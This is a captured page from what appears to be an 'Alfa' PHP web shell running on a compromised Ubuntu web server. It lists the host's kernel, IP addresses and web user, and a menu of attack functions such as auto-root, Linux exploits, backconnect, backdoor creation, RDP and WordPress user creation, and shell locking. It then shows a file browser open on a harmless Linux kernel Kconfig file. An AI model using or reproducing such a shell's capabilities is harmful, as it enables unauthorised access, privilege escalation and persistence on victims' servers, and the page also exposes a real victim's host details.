Linux lionsclub 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 161.35.52.75 | : 3.131.98.117
Cant Read [ /etc/named.conf ]
7.4.28
www-data
shells.trxsecurity.org
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
src /
linux-headers-4.15.0-210 /
drivers /
fmc /
[ HOME SHELL ]
Name
Size
Permission
Action
Kconfig
1.7
KB
-rw-r--r--
Makefile
368
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Kconfig
# # FMC (ANSI-VITA 57.1) bus support # menuconfig FMC tristate "FMC support" help FMC (FPGA Mezzanine Carrier) is a mechanical and electrical standard for mezzanine cards that plug into a carrier board. This kernel subsystem supports the matching between carrier and mezzanine based on identifiers stored in the internal I2C EEPROM, as well as having carrier-independent drivers. The framework was born outside of the kernel and at this time the off-tree code base is more complete. Code and documentation is at git://ohwr.org/fmc-projects/fmc-bus.git . if FMC config FMC_FAKEDEV tristate "FMC fake device (software testing)" help This is a fake carrier, bringing a default EEPROM content that can be rewritten at run time and usef for matching mezzanines. config FMC_TRIVIAL tristate "FMC trivial mezzanine driver (software testing)" help This is a fake mezzanine driver, to show how FMC works and test it. The driver also handles interrupts (we used it with a real carrier before the mezzanines were produced) config FMC_WRITE_EEPROM tristate "FMC mezzanine driver to write I2C EEPROM" help This driver matches every mezzanine device and can write the internal EEPROM of the PCB, using the firmware loader to get its binary and the function carrier->reprogram to actually do it. It is useful when the mezzanines are produced. config FMC_CHARDEV tristate "FMC mezzanine driver that registers a char device" help This driver matches every mezzanine device and allows user space to read and write registers using a char device. It can be used to write user-space drivers, or just get acquainted with a mezzanine before writing its specific driver. endif # FMC
Close